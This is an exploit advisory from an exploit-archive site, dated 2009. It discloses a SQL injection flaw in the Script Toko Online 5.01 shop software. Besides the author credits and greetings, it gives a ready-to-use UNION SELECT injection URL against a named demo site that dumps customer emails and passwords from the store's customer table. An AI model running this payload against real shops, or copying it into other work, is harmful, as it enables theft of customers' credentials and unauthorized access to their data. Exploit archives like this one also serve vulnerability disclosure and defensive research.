[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Script Toko Online 5.01 (shop_display_products.php) SQL Injection Vuln
# Published : 2009-01-26
# Author : k1n9k0ng
# Previous Title : E-ShopSystem Auth Bypass / SQL Injection Multiple Vulnerabilities
# Next Title : SHOP-INET v4 (show_cat2.php grid) SQL Injection Vulnerability


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Script Toko Online Vs.5.01
Scripts site    : http://www.gempar.com/
Discovered By   : k1n9k0ng
My Site         : http://www.sekuritionline.net
IRC Channel     : #sekuritionline
Special To      : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Demo Site :
http://www.gempar.com/demotoko/

Bug Found:
http://www.gempar.com/demotoko/shop_display_products.php?cat_id=-1 union select concat(email,0x3a,password),1,2,3,4,5,6,7 from naxtor_cart_store_customer/*

# www.Syue.com [2009-01-26]